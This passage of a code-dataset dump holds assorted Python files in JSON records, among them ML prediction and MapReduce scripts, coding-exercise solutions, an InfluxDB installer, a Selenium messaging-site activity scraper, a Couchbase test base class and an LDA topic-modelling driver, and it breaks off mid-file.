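assert abs(iou_xywh((10, 10, 4, 4), (10, 10, 4, 4)) - 1.0) < 1e-9  # identical boxes
assert iou_xywh((0, 0, 2, 2), (10, 10, 2, 2)) == 0.0               # disjoint boxes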
FLAGS.data == 'fluxbypass_aqua':\n PREFIX = '8col009_01_'\n DATADIR = FLAGS.data_dir + FLAGS.data + '/'\n\n scale_dict = load_pickle(DATADIR + '009_Wm2_scaling.pkl'); in_vars = load_pickle(DATADIR + '009_Wm2_in_vars.pkl')\n out_vars = load_pickle(DATADIR + '009_Wm2_out_vars.pkl'); dP = load_pickle(DATADIR + '009_Wm2_dP.pkl')\n\n valid_gen = DataGenerator(\n data_fn = DATADIR+PREFIX+'valid.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = DATADIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict,\n batch_size=FLAGS.batch_size,\n shuffle=False\n )\nelse:\n from data_generator import DataGenerator\n\n valid_gen = DataGenerator(\n data_dir=FLAGS.data_dir + FLAGS.data + '/',\n feature_fn=data_opts[FLAGS.data]['test']['feature_fn'],\n target_fn=data_opts[FLAGS.data]['test']['target_fn'],\n batch_size=FLAGS.batch_size,\n norm_fn=data_opts[FLAGS.data]['norm_fn'],\n fsub='feature_means',\n fdiv='feature_stds',\n tmult='target_conv',\n shuffle=False,\n )\n\n # load weights from h5 file\n model = load_model(FLAGS.model_path)\n\n trial_num = FLAGS.model_path.split('/')[-1].replace('.h5','')\n\n print('Trial Num:', trial_num)\n\n predictions = model.predict_generator(\n valid_gen.return_generator(),\n steps=valid_gen.n_batches,\n workers=16,\n max_queue_size=50,\n )\n\n # rescale predictions\n predictions = (predictions/valid_gen.target_norms[1]) + valid_gen.target_norms[0]\n\n # save predictions to path\n np.savez(output_path + 'predictions_{}.npz'.format(trial_num), predictions=predictions)\n","sub_path":"notebooks/tbeucler_devlog/hp_opt_conservation/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"623918401","text":"#!/usr/bin/python\nimport sys\nsys.path.append('/usr/lib/python2.6/dist-packages')\nimport re,pickle,base64,zlib\nfrom mrjob.job import MRJob\nfrom sys import stderr\nimport pandas as pd\nimport numpy as np\nimport sklearn as sk\nimport gzip\nimport pickle\n\nf = gzip.open('ML_station_hash.pkl.gz', 'rb' )\npickleFile = pickle.Unpickler(f)\nhashtable = pickleFile.load()\nf.close()\n\nclass split_weather(MRJob): \n \n def mapper_pre(self, _, line):\n global hashtable\n elements = line.split(',')\n if elements[1] == 'TMAX' or elements[1] == 'TMIN':\n region = hashtable.get(elements[0])\n if region != None:\n yield (elements[0], elements[2], region), (elements[1], elements[3:])\n \n def reducer_pre(self, station_pair, weathers):\n weather_max = []\n weather_min = []\n valid_count = 0\n data_count = 0\n for weather in weathers:\n if weather[0] == 'TMAX': weather_max = weather[1]\n if weather[0] == 'TMIN': weather_min = weather[1]\n data_count += 1\n if data_count == 2 and len(weather_max) == 365 and len(weather_min) == 365:\n for i in range(365):\n if weather_max[i] != '' and weather_min[i] != '':\n valid_count += 1\n if valid_count >= 180:\n weather_data = weather_max + weather_min\n yield station_pair[2], weather_data\n \n def reducer_split(self, region, matrixs):\n for matrix in matrixs:\n yield (region, matrix)\n \n def steps(self):\n return [self.mr(mapper = self.mapper_pre, reducer=self.reducer_pre),\n self.mr(reducer = self.reducer_split)]\n \nif __name__ == '__main__':\n 
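The prediction rescaling above, predictions/target_norms[1] + target_norms[0], inverts a normalization of the form y_norm = (y - mean) * conv with target_norms holding (mean, conv); a quick numeric round-trip under that assumption:

import numpy as np

mean, conv = 2.0, 0.5                # illustrative values, not the real norms
y = np.array([1.0, 3.0, 5.0])
y_norm = (y - mean) * conv           # assumed forward normalization
y_back = y_norm / conv + mean        # the inverse applied to predictions above
assert np.allclose(y, y_back)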
split_weather.run()","sub_path":"notebooks/weather.mapreduce/split_ML.py","file_name":"split_ML.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"250203674","text":"'''\n You are given an array A[] , you have to construct a new array A2[].\nThe values in A2[] are obtained by doing Xor of consecutive elements in array.\n\nInput:\nFirst line of the input contains t, the number of test cases. Each line of the test case contains a number n specifying the number of elements.\n Each 'n' lines denoting elements of array A[].\n\nOutput:\nEach new line of the output contains element of array A2[] .\n\n \n\nConstraints:\n\n1<=t<=100\n\n1<=n<=100000\n\n1<=A[i]<=100000\n\nExample:\n\nSample Input 0\n1\n5\n10 11 1 2 3\n\nSample Output 0\n1 10 3 1 3\n'''\n\nfor _ in range(int(input())):\n n=int(input())\n arr=list(map(int,input().split()))\n for i in range(n-1):\n val=arr[i]^arr[i+1]\n print(val,end=\" \")\n print(arr[n-1])","sub_path":"Geeks For Geeks/Arrays/gameWithNumbers.py","file_name":"gameWithNumbers.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"550638595","text":"#########\n# Copyright (c) 2017 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport json\nfrom os.path import join\n\nfrom .. import (\n SOURCES,\n SERVICE_USER,\n SERVICE_GROUP,\n CONFIG,\n ENDPOINT_IP,\n)\n\nfrom ..service_names import INFLUXDB\n\nfrom ... import constants\nfrom ...config import config\nfrom ...logger import get_logger\nfrom ...exceptions import ValidationError, BootstrapError\n\nfrom ...utils import common\nfrom ...utils.systemd import systemd\nfrom ...utils.install import yum_install, yum_remove\nfrom ...utils.network import wait_for_port, check_http_response\nfrom ...utils.files import copy_notice, remove_notice, remove_files, temp_copy\n\nlogger = get_logger(INFLUXDB)\n\n# Currently, cannot be changed due to webui not allowing to configure it.\nINFLUXDB_ENDPOINT_PORT = 8086\n\nHOME_DIR = join('/opt', INFLUXDB)\nLOG_DIR = join(constants.BASE_LOG_DIR, INFLUXDB)\nINIT_D_PATH = join('/etc', 'init.d', INFLUXDB)\nCONFIG_PATH = join(constants.COMPONENTS_DIR, INFLUXDB, CONFIG)\n\n\ndef _configure_database(host, port):\n db_user = \"root\"\n db_pass = \"root\"\n db_name = \"cloudify\"\n\n logger.info('Creating InfluxDB Database...')\n\n # the below request is equivalent to running:\n # curl -S -s \"http://localhost:8086/db?u=root&p=root\" '-d \"{\\\"name\\\": \\\"cloudify\\\"}\" # NOQA\n import urllib\n import urllib2\n import ast\n\n endpoint_for_list = 'http://{0}:{1}/db'.format(host, port)\n endpoint_for_creation = ('http://{0}:{1}/cluster/database_configs/'\n '{2}'.format(host, port, db_name))\n params = urllib.urlencode(dict(u=db_user, p=db_pass))\n url_for_list = endpoint_for_list + '?' + params\n url_for_creation = endpoint_for_creation + '?' 
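The XOR loop in the gameWithNumbers record above has a compact equivalent: pair each element with its successor and carry the last element over unchanged, which reproduces the sample output:

def xor_pairs(arr):
    # XOR consecutive elements; the final element is kept as-is
    return [a ^ b for a, b in zip(arr, arr[1:])] + [arr[-1]]

assert xor_pairs([10, 11, 1, 2, 3]) == [1, 10, 3, 1, 3]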
+ params\n\n # check if db already exists\n db_list = eval(urllib2.urlopen(urllib2.Request(url_for_list)).read())\n try:\n assert not any(d.get('name') == db_name for d in db_list)\n except AssertionError:\n logger.info('Database {0} already exists!'.format(db_name))\n return\n\n try:\n tmp_path = temp_copy(join(CONFIG_PATH, 'retention.json'))\n\n with open(tmp_path) as policy_file:\n retention_policy = policy_file.read()\n logger.debug(\n 'Using retention policy: \\n{0}'.format(retention_policy))\n data = json.dumps(ast.literal_eval(retention_policy))\n logger.debug('Using retention policy: \\n{0}'.format(data))\n content_length = len(data)\n request = urllib2.Request(url_for_creation, data, {\n 'Content-Type': 'application/json',\n 'Content-Length': content_length})\n logger.debug('Request is: {0}'.format(request))\n request_reader = urllib2.urlopen(request)\n response = request_reader.read()\n logger.debug('Response: {0}'.format(response))\n request_reader.close()\n common.remove('/tmp/retention.json')\n\n except Exception as ex:\n raise BootstrapError(\n 'Failed to create: {0} ({1}).'.format(db_name, ex)\n )\n\n logger.debug('Verifying database created successfully...')\n db_list = eval(urllib2.urlopen(urllib2.Request(url_for_list)).read())\n try:\n assert any(d.get('name') == db_name for d in db_list)\n except AssertionError:\n raise ValidationError('Verification failed!')\n logger.info('Databased {0} successfully created'.format(db_name))\n\n\ndef _install_influxdb():\n source_url = config[INFLUXDB][SOURCES]['influxdb_source_url']\n yum_install(source_url)\n\n\ndef _install():\n if config[INFLUXDB]['is_internal']:\n _install_influxdb()\n\n\ndef _create_paths():\n common.mkdir(HOME_DIR)\n common.mkdir(LOG_DIR)\n\n _deploy_config_file()\n\n common.chown(INFLUXDB, INFLUXDB, HOME_DIR)\n common.chown(INFLUXDB, INFLUXDB, LOG_DIR)\n\n\ndef _deploy_config_file():\n logger.info('Deploying InfluxDB configuration...')\n common.copy(\n source=join(CONFIG_PATH, 'config.toml'),\n destination=join(HOME_DIR, 'shared', 'config.toml')\n )\n\n\ndef _configure_local_influxdb():\n config[INFLUXDB][SERVICE_USER] = INFLUXDB\n config[INFLUXDB][SERVICE_GROUP] = INFLUXDB\n\n _create_paths()\n copy_notice(INFLUXDB)\n\n systemd.configure(INFLUXDB)\n # Provided with InfluxDB's package. 
Will be removed if it exists.\n common.remove(INIT_D_PATH)\n\n\ndef _check_response():\n influxdb_endpoint_ip = config[INFLUXDB][ENDPOINT_IP]\n influxdb_url = 'http://{0}:{1}'.format(\n influxdb_endpoint_ip,\n INFLUXDB_ENDPOINT_PORT\n )\n response = check_http_response(influxdb_url)\n\n # InfluxDB normally responds with a 404 on GET to /, but also allow other\n # non-server-error response codes to allow for that behaviour to change.\n if response.code >= 500:\n raise ValidationError('Could not validate InfluxDB')\n\n\ndef _verify_influxdb_alive():\n systemd.verify_alive(INFLUXDB)\n wait_for_port(INFLUXDB_ENDPOINT_PORT)\n _check_response()\n\n\ndef _configure():\n influxdb_endpoint_ip = config[INFLUXDB][ENDPOINT_IP]\n is_internal = config[INFLUXDB]['is_internal']\n if is_internal:\n _configure_local_influxdb()\n systemd.restart(INFLUXDB)\n\n wait_for_port(INFLUXDB_ENDPOINT_PORT, influxdb_endpoint_ip)\n _configure_database(influxdb_endpoint_ip, INFLUXDB_ENDPOINT_PORT)\n\n if is_internal:\n logger.info('Starting InfluxDB Service...')\n systemd.restart(INFLUXDB)\n _verify_influxdb_alive()\n\n\ndef install():\n logger.notice('Installing InfluxDB...')\n _install()\n _configure()\n logger.notice('InfluxDB successfully installed')\n\n\ndef configure():\n logger.notice('Configuring InfluxDB...')\n _configure()\n logger.notice('InfluxDB successfully configured')\n\n\ndef remove():\n logger.notice('Removing Influxdb...')\n remove_notice(INFLUXDB)\n systemd.remove(INFLUXDB)\n remove_files([HOME_DIR, LOG_DIR, INIT_D_PATH])\n yum_remove(INFLUXDB)\n logger.notice('InfluxDB successfully removed')\n\n\ndef start():\n is_internal = config[INFLUXDB]['is_internal']\n if is_internal:\n logger.notice('Starting Influxdb...')\n systemd.start(INFLUXDB)\n _verify_influxdb_alive()\n logger.notice('Influxdb successfully started')\n\n\ndef stop():\n is_internal = config[INFLUXDB]['is_internal']\n if is_internal:\n logger.notice('Stopping Influxdb...')\n systemd.stop(INFLUXDB)\n logger.notice('Influxdb successfully stopped')\n","sub_path":"cfy_manager/components/influxdb/influxdb.py","file_name":"influxdb.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183361061","text":"import pickle\nfrom selenium import webdriver\nimport time\nimport os\nimport sys\nimport json\n\nfrom storage import BrowserStorage\nimport facebook\nimport telegram\nimport skype\n\nsite_parsers = {\n \"telegram\": telegram.TelegramParser,\n \"facebook\": facebook.FacebookParser,\n \"skype\": skype.SkypeParser\n}\n\nrequested_site = sys.argv[1] if len(sys.argv) > 1 else \"telegram\"\nif requested_site not in site_parsers:\n print(\"Incorrect requested site -\", requested_site, \", Supported -\", list(site_parsers.keys))\n exit(1)\nelse:\n print(\"Requested site:\", requested_site)\n\ndef ensure_folders_exist(file_name):\n if not os.path.exists(os.path.dirname(file_name)):\n os.makedirs(os.path.dirname(file_name))\n\n# disable \"Allow Notifications\" pop-up\n_browser_profile = webdriver.FirefoxProfile()\n_browser_profile.set_preference(\"dom.webnotifications.enabled\", False)\ndriver = webdriver.Firefox(firefox_profile=_browser_profile)\n\n\nwebsite_parser = site_parsers[requested_site](driver)\nloading_wait = website_parser.loading_wait\n\n\nprint(\"Navigating to the website...\")\ndriver.get(website_parser.root_url)\ndriver.implicitly_wait(loading_wait)\ntime.sleep(loading_wait)\n\nshould_login = True\n\n# load cookies if they exist\ncookie_file = 
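_check_response above treats anything below a 500 as proof that InfluxDB answered (it normally 404s on GET /); a stdlib sketch of that tolerance, using urllib2 to match the Python 2 imports elsewhere in the record (the helper name is illustrative):

import urllib2  # Python 2, as in the record above

def influxdb_alive(url):
    try:
        urllib2.urlopen(url)
        return True
    except urllib2.HTTPError as e:
        # a 404 on / is expected; only a server error counts as down
        return e.code < 500
    except urllib2.URLError:
        return False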
website_parser.session_dir + \"cookies.pkl\"\nlocal_storage_file = website_parser.session_dir + \"localStorage.pkl\"\nsession_storage_file = website_parser.session_dir + \"sessionStorage.pkl\"\n\nif (os.path.exists(cookie_file)): # there are some cookies\n print(\"Loading cookies...\")\n print(\"Navigate to a dummy URL...\")\n driver.get(website_parser.root_url + \"dummyurl\")\n time.sleep(loading_wait)\n print(\"Add for the current website...\")\n cookies = pickle.load(open(cookie_file, \"rb\"))\n for cookie in cookies:\n driver.add_cookie(cookie)\n print(\"Loading localStorage...\")\n localStorage = BrowserStorage(driver, 'localStorage')\n localStorageData = pickle.load(open(local_storage_file, \"rb\"))\n for key, value in localStorageData.items(): localStorage.set(key, value)\n print(\"Loading sessionStorage...\")\n sessionStorage = BrowserStorage(driver, 'sessionStorage')\n sessionStorageData = pickle.load(open(session_storage_file, \"rb\"))\n for key, value in sessionStorageData.items(): sessionStorage.set(key, value)\n should_login = False\nelse:\n print(\"No cookies file\")\n\nif should_login:\n print(\"Logging in...\")\n website_parser.Authenticate()\n time.sleep(loading_wait)\n if website_parser.save_session:\n print(\"Saving logged in session in cookies...\")\n ensure_folders_exist(cookie_file)\n pickle.dump(driver.get_cookies(), open(cookie_file, \"wb\"))\n pickle.dump(BrowserStorage(driver, 'localStorage').items(), open(local_storage_file, \"wb\"))\n pickle.dump(BrowserStorage(driver, 'sessionStorage').items(), open(session_storage_file, \"wb\"))\nelse:\n print(\"Already logged in. Refreshing...\")\n driver.get(website_parser.root_url)\n time.sleep(loading_wait)\n\n# main parsing loop\ntry:\n data_file = website_parser.data_file\n while True:\n try:\n print(\"Retrieving activity data...\")\n activity_data = website_parser.ParseActivityData()\n\n print(\"Saving one entry to data file...\")\n ensure_folders_exist(data_file)\n with open(data_file, \"a\") as dfile:\n dfile.write(json.dumps(activity_data) + \"\\n\")\n\n print(\"Waiting \" + str(website_parser.parse_wait / 60) + \" minutes...\")\n time.sleep(website_parser.parse_wait)\n except KeyboardInterrupt:\n break\n except:\n time.sleep(60)\n continue\nexcept KeyboardInterrupt:\n pass\n\n\ndriver.close()\n","sub_path":"parsers/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"537033652","text":"# https://leetcode.com/explore/challenge/card/october-leetcoding-challenge/561/week-3-october-15th-october-21st/3500/\n\n# Minimum Domino Rotations For Equal Row\n\n# In a row of dominoes, A[i] and B[i] represent the top and bottom halves of the ith domino. 
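The session persistence in the parser record above is a pickle round-trip over Selenium's cookie list; reduced to two helpers (driver is assumed to be any live WebDriver instance):

import pickle

def save_cookies(driver, path):
    with open(path, "wb") as f:
        pickle.dump(driver.get_cookies(), f)

def load_cookies(driver, path):
    # add_cookie only works once the browser is on the cookie's domain,
    # which is why the script above first visits a dummy URL
    with open(path, "rb") as f:
        for cookie in pickle.load(f):
            driver.add_cookie(cookie)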
\n# (A domino is a tile with two numbers from 1 to 6 - one on each half of the tile.)\n\n# We may rotate the ith domino, so that A[i] and B[i] swap values.\n\n# Return the minimum number of rotations so that all the values in A are the same, \n# or all the values in B are the same.\n\n# If it cannot be done, return -1.\n\n\n# Example 1:\n# Input: A = [2,1,2,4,2,2], B = [5,2,6,2,3,2]\n# Output: 2\n# Explanation: \n# The first figure represents the dominoes as given by A and B: before we do any rotations.\n# If we rotate the second and fourth dominoes, we can make every value in the top row equal \n# to 2, as indicated by the second figure.\n\n# Example 2:\n# Input: A = [3,5,1,2,3], B = [3,6,3,3,4]\n# Output: -1\n# Explanation: \n# In this case, it is not possible to rotate the dominoes to make one row of values equal.\n \n\n# Constraints:\n# 2 <= A.length == B.length <= 2 * 10^4\n# 1 <= A[i], B[i] <= 6\n\n\nfrom typing import List\ndef minDominoRotations(A: List[int], B: List[int]) -> int:\n\tn = len(A)\n\tfor target in [A[0], B[0]]:\n\t\tif all(target in [a, b] for a, b in zip(A, B)):\n\t\t\treturn n - max(A.count(target), B.count(target))\n\treturn -1\n\nassert(minDominoRotations([2,1,2,4,2,2], [5,2,6,2,3,2]) == 2)\nassert(minDominoRotations([3,5,1,2,3], [3,6,3,3,4]) == -1)\n\n\n\n\n\n\n","sub_path":"2020 October LeetCoding Challenge/19_minDominoRotations.py","file_name":"19_minDominoRotations.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99067861","text":"sampleA = [692,1,32]\r\nsampleB = [0,0,0,14,15,123,2431]\r\n\r\ndef realWorldMergeSort(listA,listB):\r\n \"\"\"\\n\r\n [05/20/13] Challenge #126 [Easy] Real-World Merge Sort\\n\r\n Return a merged and sorted list of elements of list A into list B\r\n where you cannot allocate any extra space other than simple/trivial\r\n local variables.\r\n \"\"\"\r\n \r\n for num in listA: # Loop through listA to locate a spot in listB\r\n i = 0 # Initialize counter to loop through listB\r\n while(num > listB[i]): # If the current number pulled from listA is bigger\r\n if(listB[i] != 0): # than the element in listB and the element isn't 0,\r\n listB[i - 1] = listB[i] # copy the current element into an earlier element in\r\n i += 1 # the list. 
Once num is no longer greater than the\r\n listB[i - 1] = num # current element place num in the previous element\r\n # list and grab the next number in listA.\r\n return listB # Return the list we've sorted.\r\n\r\nprint(realWorldMergeSort(sampleA,sampleB))\r\n","sub_path":"easy/05202013_real-world_merge_sort.py","file_name":"05202013_real-world_merge_sort.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"155103662","text":"\"\"\"\nCreated on Feb 16, 2022\n\n@author: ritesh.agarwal\n\"\"\"\nfrom Cb_constants import CbServer\nfrom Jython_tasks.task import DeployDataplane\nfrom TestInput import TestInputSingleton\nfrom bucket_utils.bucket_ready_functions import BucketUtils\nfrom capella_utils.common_utils import Pod, Tenant\nfrom capella_utils.dedicated import CapellaUtils as DedicatedUtils\nfrom capella_utils.serverless import CapellaUtils as ServerlessUtils\nfrom cb_basetest import CouchbaseBaseTest\nfrom cluster_utils.cluster_ready_functions import ClusterUtils, CBCluster\nfrom constants.cloud_constants.capella_constants import AWS\nfrom security_config import trust_all_certs\nimport global_vars\n\n\nclass OnCloudBaseTest(CouchbaseBaseTest):\n def setUp(self):\n super(OnCloudBaseTest, self).setUp()\n\n for server in self.input.servers:\n server.type = \"serverless\"\n # End of framework parameters\n\n # Cluster level info settings\n self.servers = list()\n self.capella = self.input.capella\n self.num_dataplanes = self.input.param(\"num_dataplanes\", 1)\n\n self.wait_timeout = self.input.param(\"wait_timeout\", 120)\n CbServer.use_https = True\n trust_all_certs()\n\n # initialize pod object\n url = self.input.capella.get(\"pod\")\n self.pod = Pod(\"https://%s\" % url,\n self.input.capella.get(\"token\",\n None))\n\n self.tenant = Tenant(self.input.capella.get(\"tenant_id\"),\n self.input.capella.get(\"capella_user\"),\n self.input.capella.get(\"capella_pwd\"))\n\n self.rest_username = \\\n TestInputSingleton.input.membase_settings.rest_username\n self.rest_password = \\\n TestInputSingleton.input.membase_settings.rest_password\n\n self.log_setup_status(self.__class__.__name__, \"started\")\n self.cluster_name_format = \"C%s\"\n self.nebula_details = dict()\n\n self.tenant.project_id = \\\n TestInputSingleton.input.capella.get(\"project\", None)\n if not self.tenant.project_id:\n DedicatedUtils.create_project(self.pod, self.tenant, \"a_taf_run\")\n\n # Comma separated cluster_ids [Eg: 123-456-789,111-222-333,..]\n self.cb_image = self.input.capella.get(\"cb_image\", \"\")\n self.dapi_image = self.input.capella.get(\"dapi_image\", \"\")\n self.dn_image = self.input.capella.get(\"dn_image\", \"\")\n self.dataplane_id = self.input.capella.get(\"dataplane\", \"\")\n num_dataplanes = self.input.param(\"num_dataplanes\", 0)\n self.cluster = CBCluster(username=self.rest_username,\n password=self.rest_password,\n servers=[None] * 40)\n self.cluster.pod = self.pod\n self.cluster.tenant = self.tenant\n self.cluster.type = \"serverless\"\n\n tasks = list()\n self.dataplanes = list()\n for _ in range(num_dataplanes):\n self.generate_dataplane_config()\n self.log.info(self.dataplane_config)\n deploy_task = DeployDataplane(self.cluster,\n self.dataplane_config,\n timeout=self.wait_timeout)\n self.task_manager.add_new_task(deploy_task)\n tasks.append(deploy_task)\n for deploy_task in tasks:\n self.task_manager.get_task_result(deploy_task)\n self.assertTrue(deploy_task.result, \"Dataplane deployment 
failed!\")\n self.dataplanes.append(deploy_task.dataplane_id)\n\n if self.dataplanes:\n self.dataplane_id = self.dataplanes[0]\n\n self.cluster_util = ClusterUtils(self.task_manager)\n self.bucket_util = BucketUtils(self.cluster_util, self.task)\n self.serverless_util = ServerlessUtils(self.cluster)\n global_vars.serverless_util = self.serverless_util\n\n def tearDown(self):\n self.shutdown_task_manager()\n if self.sdk_client_pool:\n self.sdk_client_pool.shutdown()\n\n if self.skip_teardown_cleanup:\n return\n for bucket in self.cluster.buckets:\n self.log.info(\"Deleting database: {}\".format(bucket.name))\n self.serverless_util.delete_database(self.pod, self.tenant, bucket.name)\n\n for bucket in self.cluster.buckets:\n self.serverless_util.wait_for_database_deleted(self.tenant, bucket.name)\n\n for dataplane_id in self.dataplanes:\n self.log.info(\"Destroying dataplane: {}\".format(dataplane_id))\n self.serverless_util.delete_dataplane(dataplane_id)\n if not TestInputSingleton.input.capella.get(\"project\", None):\n DedicatedUtils.delete_project(self.pod, self.tenant)\n\n def generate_dataplane_config(self):\n provider = self.input.param(\"provider\", AWS.__str__).lower()\n region = self.input.param(\"region\", AWS.Region.US_EAST_1)\n self.dataplane_config = {\n \"provider\": provider,\n \"region\": region,\n \"overRide\": {\n \"couchbase\": {\n \"image\": self.cb_image,\n \"version\": \"7.2.0\",\n }\n }\n }\n if self.dn_image:\n self.dataplane_config[\"overRide\"].update(\n {\n \"nebula\": {\n \"image\": self.dn_image\n }\n }\n )\n if self.dapi_image:\n self.dataplane_config[\"overRide\"].update(\n {\n \"dataApi\": {\n \"image\": self.dapi_image\n }\n }\n )\n\n\nclass ClusterSetup(OnCloudBaseTest):\n def setUp(self):\n super(ClusterSetup, self).setUp()\n\n self.log_setup_status(\"ClusterSetup\", \"started\", \"setup\")\n\n # Print cluster stats\n self.cluster_util.print_cluster_stats(self.cluster)\n self.log_setup_status(\"ClusterSetup\", \"complete\", \"setup\")\n\n def tearDown(self):\n super(ClusterSetup, self).tearDown()\n","sub_path":"pytests/serverlessbasetestcase.py","file_name":"serverlessbasetestcase.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"27127863","text":"import pandas as pd\nimport nltk\nfrom gensim import corpora, models, similarities\nimport gensim\nfrom nltk.corpus import stopwords\nimport sys\nreload(sys)\nimport numpy as np\nfrom gensim.corpora import Dictionary, MmCorpus\nimport re\nimport string\nsys.setdefaultencoding('utf-8')\nimport logging\nimport StopWord\n\nfrom PConfig import PConfig\nfrom PConstant import PConstant\n\n\nclass TopicDriver(object):\n\n def __init__(self, datarecord, colnnames, delimtr):\n self._flogger()\n self.datarecord = datarecord\n self.df = pd.read_csv(self.datarecord, names=colnnames, delimiter=delimtr)\n self.stopwords = StopWord.EnglishStopWord().stopwords()\n \n\n def __cleanze(self, textcolname):\n self._logger.info(\"tokenzing = '%s' \", textcolname)\n self.df[\"tokenized\"] = self.df[textcolname].astype(unicode).apply(nltk.word_tokenize)\n\n def filterfunc(x):\n fx = []\n for item in x:\n if item not in self.stopwords:\n if len(item) > 3:\n if not item.isdigit():\n if not re.search('[0-9]', item):\n if item.isalpha():\n fx.append(item.lower())\n return fx\n self._logger.info(\"filtering = '%s' \", textcolname)\n self.df['tokens'] = self.df['tokenized'].apply(filterfunc)\n\n def __corpus(self):\n \n def nltk_stopwords():\n 
return set(nltk.corpus.stopwords.words('english'))\n\n def prep_corpus(docs, additional_stopwords=set(), no_below=2, no_above=0.05):\n\n dictionary = Dictionary(docs)\n stopwords = nltk_stopwords().union(additional_stopwords)\n stopword_ids = map(dictionary.token2id.get, stopwords)\n dictionary.filter_tokens(stopword_ids)\n dictionary.compactify()\n dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=None)\n dictionary.compactify()\n corpus = [dictionary.doc2bow(doc) for doc in docs]\n\n return dictionary, corpus\n\n dictionary, corpus = prep_corpus(self.df['tokens'], ['nbsp', '.', ',', '\"', \"'\", '?', '!','>', ':', ';', '(', ')', '[', ']', '{', '}','/', '.com'])\n return (dictionary, corpus)\n\n def __model(self):\n\n lda = gensim.models.ldamodel.LdaModel(corpus=self.corpus, id2word=self.dictionary, num_topics=self.num_topics, passes=self.passes) \n return lda\n\n def discover(self, textcolname, num_topics, passes):\n self.num_topics = num_topics\n self.passes = passes\n self._logger.info(\"cleanzing data for '%s'\", textcolname)\n self.__cleanze(textcolname)\n self._logger.info(\"creating corpus and dictionary for '%s'\", textcolname)\n self.dictionary, self.corpus = self.__corpus()\n self._logger.info(\"applying lda model '%s'\", textcolname)\n self.lda = self.__model()\n self._logger.info(\"saving models for '%s'\", textcolname)\n MmCorpus.serialize(PConstant.CORPUS_DIR_PATH.value + textcolname +'_corpus.mm', self.corpus)\n self.dictionary.save( PConstant.DICTIONARY_DIR_PATH.value + textcolname + '_dictionary.dict')\n self.lda.save( PConstant.LDA_DIR_PATH.value + textcolname + '_lda.model')\n\n def _flogger(self):\n\n self._logger = logging.getLogger('TopicDriver')\n self._logger.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n self._logger.addHandler(ch)\n\n","sub_path":"TopicDriver.py","file_name":"TopicDriver.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549652793","text":"import random\n\nFILENAME = \"database.txt\"\n\nROW_COUNT = 140\n\nTOURISM = [i for i in range(3)]\nEXCURSION = [i for i in range(3)]\nSEASON = [i for i in range(4)]\nSPORT = [i for i in range(3)]\nMAINLAND = [i for i in range(5)]\n\ndef gen_county_capital_list():\n data = []\n with open(\"countries.cvs\", \"r\") as f:\n s = f.readline()\n\n i = 0\n while \"\" != s:\n s = f.readline()\n row = s.split(\",\")[:2]\n for i in range(len(row)):\n row[i] = row[i].replace('\"', '')\n # row[i] = row[i].replace('\\n', '')\n\n data.append(row)\n data.pop()\n\n return data\n\ndef is_char_alphabetic(char):\n if (ord(char) not in range(ord('a'), ord('z') + 1) and\n ord(char) not in range(ord('A'), ord('Z') + 1)):\n return False\n\n return True\n\ndef is_word_alhabetic(word):\n for char in word:\n if not is_char_alphabetic(char):\n return False\n\n return True\n\ndef process_data(data):\n new_data = []\n for country, capital in data:\n if is_word_alhabetic(country) and is_word_alhabetic(capital):\n new_data.append((country, capital))\n return new_data\n\ndef uint32_t():\n return str(random.randrange(2**32))\n\ndef int32_t():\n return str(random.randrange(-2**31, 2**31))\n\ndef main():\n country_capital = gen_county_capital_list()\n country_capital = process_data(country_capital)\n\n random.shuffle(country_capital)\n\n data = []\n\n print(\"Len:\", 
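discover() in the TopicDriver record above boils down to Dictionary -> bag-of-words corpus -> LdaModel; the same gensim pipeline on two toy documents (num_topics and passes here are arbitrary):

from gensim.corpora import Dictionary
from gensim.models import LdaModel

docs = [["cats", "purr", "meow"], ["dogs", "bark", "fetch"]]
dictionary = Dictionary(docs)
corpus = [dictionary.doc2bow(doc) for doc in docs]  # list of (token_id, count) pairs
lda = LdaModel(corpus=corpus, id2word=dictionary, num_topics=2, passes=5)
print(lda.print_topics())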
